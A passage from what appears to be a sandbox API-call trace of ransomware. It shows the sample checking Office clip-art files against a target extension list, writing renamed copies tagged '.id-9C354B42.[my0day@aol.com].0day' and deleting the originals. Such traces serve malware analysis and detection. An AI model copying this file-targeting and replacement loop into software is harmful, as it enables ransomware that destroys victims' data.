lpString2=".WMF") returned -1 [0270.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.788] lstrlenW (lpString=".zip") returned 4 [0270.788] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.788] lstrlenW (lpString=".rar") returned 4 [0270.788] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString=".bz2") returned 4 [0270.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString=".7z") returned 3 [0270.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.789] lstrlenW (lpString=".dbf") returned 4 [0270.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.789] lstrlenW (lpString=".1cd") returned 4 [0270.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.789] lstrlenW (lpString=".jpg") returned 4 [0270.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.789] lstrlenW (lpString=".doc") returned 4 [0270.789] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString=".docx") returned 5 [0270.789] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.789] lstrlenW (lpString=".pdf") returned 4 [0270.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString=".xls") returned 4 [0270.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.789] lstrlenW (lpString=".xlsx") returned 5 [0270.789] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.789] lstrlenW (lpString=".ppt") returned 4 [0270.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.789] lstrlenW (lpString=".zip") returned 4 [0270.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.789] lstrlenW (lpString=".rar") returned 4 [0270.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.789] lstrlenW (lpString=".bz2") returned 4 [0270.790] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.790] lstrlenW (lpString=".7z") returned 3 [0270.790] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.790] lstrlenW (lpString=".dbf") returned 4 [0270.790] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.790] lstrlenW (lpString=".1cd") returned 4 [0270.790] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.790] lstrlenW (lpString=".jpg") returned 4 [0270.790] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.790] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.790] lstrlenW (lpString="BS00184_.WMF") returned 12 [0270.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0270.790] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=4976) returned 1 [0270.790] CloseHandle (hObject=0x1fc) returned 1 [0270.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 0x20 [0270.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0270.791] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.791] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.791] GetLastError () returned 0x0 [0270.791] ReadFile (in: hFile=0x1fc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x1370, lpOverlapped=0x0) returned 1 [0270.795] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1380, lpOverlapped=0x0) returned 1 [0270.796] ReadFile (in: hFile=0x1fc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.796] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.796] SetEndOfFile (hFile=0x2cc) returned 1 [0270.796] CloseHandle (hObject=0x2cc) returned 1 [0270.796] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.796] SetEndOfFile (hFile=0x1fc) returned 1 [0270.799] CloseHandle (hObject=0x1fc) returned 1 [0270.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.800] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 1 [0270.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0270.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0270.800] lstrlenW (lpString=".doc") returned 4 [0270.800] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.800] lstrlenW (lpString=".docx") returned 5 [0270.800] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.800] lstrlenW (lpString=".pdf") returned 4 [0270.800] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.800] lstrlenW (lpString=".xls") returned 4 [0270.800] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.800] lstrlenW (lpString=".xlsx") returned 5 [0270.800] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.800] lstrlenW (lpString=".ppt") returned 4 [0270.800] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0270.800] lstrlenW (lpString=".zip") returned 4 [0270.800] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.800] lstrlenW (lpString=".rar") returned 4 [0270.800] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.019] lstrlenW (lpString=".bz2") returned 4 [0271.019] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.019] lstrlenW (lpString=".7z") returned 3 [0271.019] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.019] lstrlenW (lpString=".dbf") returned 4 [0271.019] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.019] lstrlenW (lpString=".1cd") returned 4 [0271.019] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.019] lstrlenW (lpString=".jpg") returned 4 [0271.020] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.020] lstrlenW (lpString=".doc") returned 4 [0271.020] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString=".docx") returned 5 [0271.020] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.020] lstrlenW (lpString=".pdf") returned 4 [0271.020] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString=".xls") returned 4 [0271.020] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.020] lstrlenW (lpString=".xlsx") returned 5 [0271.020] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.020] lstrlenW (lpString=".ppt") returned 4 [0271.020] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.020] lstrlenW (lpString=".zip") returned 4 [0271.020] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.020] lstrlenW (lpString=".rar") returned 4 [0271.020] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString=".bz2") returned 4 [0271.020] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString=".7z") returned 3 [0271.020] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.020] lstrlenW (lpString=".dbf") returned 4 [0271.020] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.020] lstrlenW (lpString=".1cd") returned 4 [0271.020] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0271.020] lstrlenW (lpString=".jpg") returned 4 [0271.020] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.021] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.021] lstrlenW (lpString="BS00186_.WMF") returned 12 [0271.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.083] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=12788) returned 1 [0271.083] CloseHandle (hObject=0x388) returned 1 [0271.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 0x20 [0271.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.163] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.163] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.163] GetLastError () returned 0x0 [0271.163] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x31f4, lpOverlapped=0x0) returned 1 [0271.166] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x3200, lpOverlapped=0x0) returned 1 [0271.167] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.167] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.167] SetEndOfFile (hFile=0x384) returned 1 [0271.167] CloseHandle (hObject=0x384) returned 1 [0271.168] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.168] SetEndOfFile (hFile=0x2cc) returned 1 [0271.171] CloseHandle (hObject=0x2cc) returned 1 [0271.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.171] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 1 [0271.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.171] lstrlenW (lpString=".doc") returned 4 [0271.172] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString=".docx") returned 5 [0271.172] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.172] lstrlenW (lpString=".pdf") returned 4 [0271.172] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString=".xls") returned 4 [0271.172] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.172] lstrlenW (lpString=".xlsx") returned 5 [0271.172] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.172] lstrlenW (lpString=".ppt") returned 4 [0271.172] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.172] lstrlenW (lpString=".zip") returned 4 [0271.172] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.172] lstrlenW (lpString=".rar") returned 4 [0271.172] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString=".bz2") returned 4 [0271.172] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString=".7z") returned 3 [0271.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.172] lstrlenW (lpString=".dbf") returned 4 [0271.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.172] lstrlenW (lpString=".1cd") returned 4 [0271.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.172] lstrlenW (lpString=".jpg") returned 4 [0271.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.172] lstrlenW (lpString=".doc") returned 4 [0271.172] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString=".docx") returned 5 [0271.173] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.173] lstrlenW (lpString=".pdf") returned 4 [0271.173] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString=".xls") returned 4 [0271.173] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.173] lstrlenW (lpString=".xlsx") returned 5 [0271.173] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.173] lstrlenW (lpString=".ppt") returned 4 [0271.173] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.173] lstrlenW (lpString=".zip") returned 4 [0271.173] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.173] lstrlenW (lpString=".rar") returned 4 [0271.173] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString=".bz2") returned 4 [0271.173] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString=".7z") returned 3 [0271.173] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.173] lstrlenW (lpString=".dbf") returned 4 [0271.173] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.173] lstrlenW (lpString=".1cd") returned 4 [0271.173] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 63 [0271.173] lstrlenW (lpString=".jpg") returned 4 [0271.173] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.173] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.173] lstrlenW (lpString="BS00440_.WMF") returned 12 [0271.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.175] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5580) returned 1 [0271.175] CloseHandle (hObject=0x2cc) returned 1 [0271.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 0x20 [0271.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.176] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.176] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.176] GetLastError () returned 0x0 [0271.176] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x15cc, lpOverlapped=0x0) returned 1 [0271.181] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x15d0, lpOverlapped=0x0) returned 1 [0271.182] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.182] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.182] SetEndOfFile (hFile=0x384) returned 1 [0271.182] CloseHandle (hObject=0x384) returned 1 [0271.182] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.182] SetEndOfFile (hFile=0x2cc) returned 1 [0271.184] CloseHandle (hObject=0x2cc) returned 1 [0271.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.185] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 1 [0271.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.185] lstrlenW (lpString=".doc") returned 4 [0271.185] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.185] lstrlenW (lpString=".docx") returned 5 [0271.185] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.185] lstrlenW (lpString=".pdf") returned 4 [0271.185] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString=".xls") returned 4 [0271.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.186] lstrlenW (lpString=".xlsx") returned 5 [0271.186] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.186] lstrlenW (lpString=".ppt") returned 4 [0271.186] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.186] lstrlenW (lpString=".zip") returned 4 [0271.186] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.186] lstrlenW (lpString=".rar") returned 4 [0271.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString=".bz2") returned 4 [0271.186] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString=".7z") returned 3 [0271.186] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.186] lstrlenW (lpString=".dbf") returned 4 [0271.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") 